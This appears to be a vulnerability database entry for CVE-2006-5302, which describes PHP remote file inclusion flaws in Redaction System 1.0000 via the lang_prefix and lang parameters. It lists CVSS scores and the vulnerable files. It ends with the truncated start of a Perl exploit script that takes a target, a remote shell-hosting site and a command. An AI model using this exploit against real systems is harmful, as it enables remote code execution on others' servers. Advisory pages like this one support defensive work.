7.5
CVSSv2

CVE-2006-5302

Published: 17/10/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple PHP remote file inclusion vulnerabilities in Redaction System 1.0000 allow remote malicious users to execute arbitrary PHP code via a URL in the (1) lang_prefix parameter to (a) conn.php, (b) sesscheck.php, (c) wap/conn.php, or (d) wap/sesscheck.php, or the (2) lang parameter to (e) index.php.

Vulnerable Product Search on Vulmon Subscribe to Product

redaction system redaction system 1.0000

Exploits

#!/usr/bin/perl use LWP::UserAgent; $target = @ARGV[0]; $shellsite = @ARGV[1]; $shellcmd = @ARGV[2]; $fileno = @ARGV[3]; if(!$target || !$shellsite) { usage(); } header(); if ($fileno eq 1) { $file = " connphp?lang_prefix="; } elsif ($fileno eq 2) { $file = "indexphp?lang="; } elsif ($fileno eq 3) { $file = "sesscheckphp?lan ...